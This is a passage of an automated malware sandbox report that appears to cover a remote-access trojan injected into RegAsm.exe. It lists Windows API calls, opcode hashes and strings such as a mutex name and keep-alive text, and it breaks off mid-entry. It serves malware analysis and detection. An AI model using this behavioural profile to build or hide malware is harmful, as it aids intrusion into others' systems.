                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventTick
                                                                                • String ID: !D@$NG
                                                                                • API String ID: 180926312-2721294649
                                                                                • Opcode ID: b7c960f52b31dbd90d58f0542966593201612a8263a01e59912c3b467a2dc670
                                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                • Opcode Fuzzy Hash: b7c960f52b31dbd90d58f0542966593201612a8263a01e59912c3b467a2dc670
                                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1818849710-4028850238
                                                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                • Opcode Fuzzy Hash: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModuleProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2905821283-0
                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastMutex
                                                                                • String ID: Rmc-4CT19T
                                                                                • API String ID: 1925916568-2159398867
                                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModuleProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2905821283-0
                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                APIs
                                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventObjectSingleWaitsend
                                                                                • String ID:
                                                                                • API String ID: 3963590051-0
                                                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 3519776433-0
                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 1818849710-0
                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-3916222277
                                                                                • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-3916222277
                                                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: P>4
                                                                                • API String ID: 176396367-4086044778
                                                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2568140703-3893581201
                                                                                • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
